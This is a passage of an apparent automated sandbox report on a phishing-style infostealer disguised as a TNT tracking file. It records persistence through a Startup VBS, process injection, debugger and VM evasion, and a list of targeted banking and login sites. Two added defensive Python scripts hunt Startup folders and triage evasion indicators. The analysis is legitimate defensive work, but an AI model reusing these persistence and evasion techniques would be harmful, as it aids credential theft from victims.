                    Source: Binary string: wntdll.pdb source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC4B37 LoadLibraryA,GetProcAddress,0_2_00EC4B37
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE8945 push ecx; ret 0_2_00EE8958
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CC4C6 push A3001CBAh; retn 001Ch2_2_001CC50D
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E8945 push ecx; ret 2_2_001E8958
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041E9A4 push ecx; retf 3_2_0041E9A5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411B63 push es; iretd 3_2_00411B64
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418C73 push ecx; iretd 3_2_00418C7A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041EC7E push cs; iretd 3_2_0041EC7F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407C3D pushad ; retf 3_2_00407C48
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004034C0 push eax; ret 3_2_004034C2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418EE6 push es; iretd 3_2_00418EE7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D7D7 push eax; ret 3_2_0040D7DC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040879B push 00000062h; retf 3_2_004087A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0225F pushad ; ret 3_2_03B027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B027FA pushad ; ret 3_2_03B027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD push ecx; mov dword ptr [esp], ecx3_2_03B309B6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0283D push eax; iretd 3_2_03B02858
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EC48D7
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F45376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F45376
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_001C48D7
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00245376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00245376
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EE3187
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
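The Boot Survival lines above record jailkeeper.exe writing jailkeeper.vbs into the per-user Startup folder, which wscript.exe then executes at every logon. The script below is an added example, written here for this page and not code from Joe Sandbox or from the sample; it walks the per-user and all-users Startup folders for files a script host or shell would run at logon and reports path, size, SHA-256 and a content preview, so hits can be compared with the dropped-file hashes in a report like this one. The demo input (a placeholder .vbs in a temporary folder) is constructed for offline use; the report does not show the real jailkeeper.vbs contents, and this placeholder is not it.

```python
"""Hunt for script droppers in Windows Startup folders.

Added example, not Joe Sandbox code. Scans the Startup folders for files a
script host or shell would execute at logon and reports path, size, SHA-256
and a preview, so hits can be matched against a report's dropped-file hashes.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Extensions Explorer hands to a script host or cmd/PowerShell at logon.
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
                     ".bat", ".cmd", ".ps1", ".hta"}


def startup_folders():
    """Per-user and all-users Startup folders, resolved from the environment."""
    folders = []
    appdata = os.environ.get("APPDATA")
    if appdata:
        folders.append(Path(appdata) / "Microsoft/Windows/Start Menu/Programs/Startup")
    programdata = os.environ.get("PROGRAMDATA")
    if programdata:
        folders.append(Path(programdata) / "Microsoft/Windows/Start Menu/Programs/StartUp")
    return folders


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def scan_startup(folders):
    """Return one record per script-type file found in the given folders."""
    findings = []
    for folder in folders:
        folder = Path(folder)
        if not folder.is_dir():
            continue
        for entry in sorted(folder.iterdir()):
            if not entry.is_file() or entry.suffix.lower() not in SCRIPT_EXTENSIONS:
                continue
            data = entry.read_bytes()
            findings.append({
                "path": str(entry),
                "size": len(data),
                "sha256": sha256_bytes(data),
                "preview": data[:120].decode("latin-1"),
            })
    return findings


# Constructed placeholder content for the offline demo; it is NOT the
# sample's jailkeeper.vbs, whose contents this report does not show.
DEMO_VBS = b"' constructed placeholder script\r\nWScript.Echo \"demo\"\r\n"


def demo_scan():
    """Build a throwaway Startup folder with one .vbs and one .txt, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        startup = Path(tmp) / "Startup"
        startup.mkdir()
        (startup / "jailkeeper.vbs").write_bytes(DEMO_VBS)
        (startup / "readme.txt").write_bytes(b"not a script\n")
        return scan_startup([startup])


if __name__ == "__main__":
    hits = scan_startup(startup_folders())
    if not hits:
        print("no script files in the live Startup folders; running the offline demo")
        hits = demo_scan()
    for hit in hits:
        print(f"{hit['path']}  {hit['size']} bytes  sha256={hit['sha256']}")
```

On a live host, run it as the affected user so APPDATA resolves to that user's profile; Startup entries are normally .lnk shortcuts, so any loose .vbs or .js there deserves a look even before the hash is compared.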

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI/Special instruction interceptor: Address: 15D32E4
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI/Special instruction interceptor: Address: 2C732E4
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 4569
                    Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 5403
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104436
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI coverage: 4.2 %
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI coverage: 5.2 %
                    Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe TID: 3496Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep count: 4569 > 30
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep time: -9138000s >= -30000s
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep count: 5403 > 30
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep time: -10806000s >= -30000s
                    Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
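The evasion signatures in this section are easier to read once aggregated per process: the thread-sleep counts and totals above, the "Process queried: DebugPort" lines (NtQueryInformationProcess with ProcessDebugPort), the rdtsc site (timing-based debugger and sandbox detection) and the many "mov eax, dword ptr fs:[00000030h]" sites (fs:[30h] is the PEB pointer in the 32-bit TEB, where BeingDebugged and NtGlobalFlag live). The script below is an added example written for this page, not Joe Sandbox code; it parses report lines in the fused text form shown here (process path, event type and detail run together with no separator) and counts those indicators per process. The sample input is copied from lines in this section. Dividing the reported sleep total by the call count gives exactly 2000 per call for mobsync.exe (9138000 / 4569 and 10806000 / 5403), which matches a Sleep(2000) loop if the figures are millisecond totals; treating the report's "s" suffix as milliseconds is an assumption made here, since seconds would mean a sleep of more than a hundred days.

```python
"""Per-process triage of Joe Sandbox evasion signature lines.

Added example, not Joe Sandbox code. Parses report lines in the fused text
form shown on this page ('Source: <process><event>: <detail>') and counts,
per process, the anti-analysis indicators a responder wants side by side.
"""
import re
from collections import defaultdict

# Constructed sample: lines copied from this report section (link residue and
# surrounding whitespace removed). Raw string so the paths keep their backslashes.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep count: 4569 > 30
Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep time: -9138000s >= -30000s
Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep count: 5403 > 30
Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep time: -10806000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D3550 mov eax, dword ptr fs:[00000030h]2_2_015D3550
Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C310 mov ecx, dword ptr fs:[00000030h]3_2_03B2C310
"""

# The process path ends at the first '.exe'; the event text follows with no separator.
PROC_RE = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)", re.IGNORECASE)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s*-?(\d+)s")
DEBUGPORT_RE = re.compile(r"Process queried:\s*DebugPort")   # NtQueryInformationProcess(ProcessDebugPort)
RDTSC_RE = re.compile(r"\brdtsc\b")                             # timing-based debugger/sandbox detection
PEB_RE = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)            # TEB+0x30: PEB pointer (BeingDebugged, NtGlobalFlag)


def _empty():
    return {"sleep_calls": 0, "sleep_total_ms": 0, "debugport_queries": 0,
            "rdtsc_sites": 0, "peb_reads": 0}


def parse_report(text):
    """Aggregate indicator counts per process path."""
    summary = defaultdict(_empty)
    for raw in text.splitlines():
        line = raw.strip()
        m = PROC_RE.match(line)
        if not m:
            continue
        entry = summary[m.group("proc")]
        rest = line[m.end():]
        count = SLEEP_COUNT_RE.search(rest)
        if count:
            entry["sleep_calls"] += int(count.group(1))
        total = SLEEP_TIME_RE.search(rest)
        if total:
            # Assumption: the report's 's' suffix denotes millisecond totals.
            entry["sleep_total_ms"] += int(total.group(1))
        if DEBUGPORT_RE.search(rest):
            entry["debugport_queries"] += 1
        if RDTSC_RE.search(rest):
            entry["rdtsc_sites"] += 1
        if PEB_RE.search(rest):
            entry["peb_reads"] += 1
    return dict(summary)


def sleep_profile(entry):
    """(per-call delay in ms, total delay in seconds), or None without sleep data."""
    if entry["sleep_calls"] == 0:
        return None
    return (entry["sleep_total_ms"] / entry["sleep_calls"],
            entry["sleep_total_ms"] / 1000.0)


def evasion_flags(entry, min_sleep_calls=30, min_sleep_total_ms=30000):
    """Apply the same thresholds the report prints ('> 30', '>= 30000')."""
    flags = []
    if entry["sleep_calls"] > min_sleep_calls and entry["sleep_total_ms"] >= min_sleep_total_ms:
        flags.append("sleep-loop")
    if entry["debugport_queries"]:
        flags.append("debugport-check")
    if entry["peb_reads"]:
        flags.append("peb-access")
    if entry["rdtsc_sites"]:
        flags.append("rdtsc-timing")
    return flags


if __name__ == "__main__":
    for proc, entry in parse_report(SAMPLE_LINES).items():
        print(f"{proc}: {evasion_flags(entry)} sleep={sleep_profile(entry)}")
```

Feed it the full signature section of a report (pasted as text) rather than the excerpt above to get the complete per-process picture; the per-call delay is the figure to compare with the sandbox's sleep-skipping threshold when deciding whether the analysis run actually reached the payload.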
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F2445A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2C6D1 FindFirstFileW,FindClose,0_2_00F2C6D1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2C75C
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2EF95
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2F0F2
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2F3F3
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F237EF
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F23B12
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2BCBC
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0022445A
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022C6D1 FindFirstFileW,FindClose,2_2_0022C6D1
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0022C75C
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022EF95
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022F0F2
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022F3F3
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_002237EF
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00223B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00223B12
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022BCBC
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EC49A0
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: w2-0G0-7.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: w2-0G0-7.10.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: w2-0G0-7.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: mobsync.exe, 0000000A.00000002.3366789394.00000000032F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8%
                    Source: w2-0G0-7.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: w2-0G0-7.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: w2-0G0-7.10.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: bRQIkEscRm.exe, 00000009.00000002.3370076388.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: w2-0G0-7.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: w2-0G0-7.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: w2-0G0-7.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: wscript.exe, 00000004.00000002.2251569105.000001F5E4B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: w2-0G0-7.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: w2-0G0-7.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: w2-0G0-7.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: firefox.exe, 0000000C.00000002.2968547157.0000023AF15FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: w2-0G0-7.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: w2-0G0-7.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-103622
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-103438
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417713 LdrLoadDll,3_2_00417713
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F33F09 BlockInput,0_2_00F33F09
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EC3B3A
